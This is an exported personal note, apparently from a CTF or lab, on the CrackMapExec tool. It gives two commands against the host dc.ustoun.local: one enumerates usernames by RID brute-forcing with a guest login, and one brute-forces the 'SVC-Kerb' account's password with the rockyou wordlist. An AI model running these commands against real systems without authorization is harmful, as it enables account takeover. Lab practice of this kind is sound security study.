<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>crackmapexec</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>crackmapexec</h1>

      <div class="ck-content">
        <p>Find usernames with the following:</p><pre><code class="language-text-plain">crackmapexec smb dc.ustoun.local -u 'guest' -p '' --rid-brute</code></pre>

        <p>Brute force the user's password with:</p><pre><code class="language-text-plain">crackmapexec smb dc.ustoun.local -u 'SVC-Kerb' -p 'rockyou.txt'</code></pre>

        <p>port 1433 is mssql,</p>
      </div>
    </div>
  </body>

</html>